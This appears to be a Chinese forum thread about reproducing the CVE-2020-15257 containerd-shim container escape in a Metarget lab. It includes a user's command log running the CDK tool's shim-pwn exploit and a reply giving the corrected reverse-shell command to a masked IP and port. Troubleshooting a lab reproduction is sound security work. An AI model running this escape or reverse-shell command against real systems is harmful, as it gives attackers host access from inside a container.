CVE-2020-15257环境复现报错

[Tr0e]

Ubuntu 18.04.6系统，安装最新的Metarget，搭建CVE-2020-15257成功：

但通过CDK反弹Shell报错如下：

aaa@ubuntu:~/Downloads$ docker run -itd --net=host ubuntu /bin/bash
76930ffb13c0f84f22d925c810f552855567174b727b84dc9af1a731bcbe084c
sbw@ubuntu:~/Downloads$
aaa@ubuntu:~/Downloads$ 
aaa@ubuntu:~/Downloads$ docker cp cdk_linux_amd64 76:/
aaa@ubuntu:~/Downloads$ 
aaa@ubuntu:~/Downloads$ docker exec -it 76 /bin/bash
root@ubuntu:/# chmod +x cdk_linux_amd64 
root@ubuntu:/# 
root@ubuntu:/# ./cdk_linux_amd64 run shim-pwn 100.xx.xx.xx 6666
2024/01/24 02:32:56 trying to run shell cmd: 100.xx.xx.xx 6666
2024/01/24 02:32:56 try socket: @/containerd-shim/moby/76930ffb13c0f84f22d925c810f552855567174b727b84dc9af1a731bcbe084c/shim.sock
2024/01/24 02:32:56 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: runc create failed: unable to start container process: error during container init: error running hook #0: error running hook: exit status 127, stdout: , stderr: bash: 100.xx.xx.xx: command not found
2024/01/24 02:32:56 exploit failed.
root@ubuntu:/# 

请问有没有什么好的建议解决该问题？谢谢!

[zrquan]

CDK 的命令少了个 reverse：./cdk_linux_amd64 run shim-pwn reverse 100.xx.xx.xx 6666

[Lvzhizheng]

已解决

[wang649]

我也遇到了同样的问题，同时还产生了另一个问题，Metarget安装的docker版本是18，但是现在18版本的拉取镜像的时候已经不能使用了，使用新版本的docker进行镜像拉取漏洞环境却没有。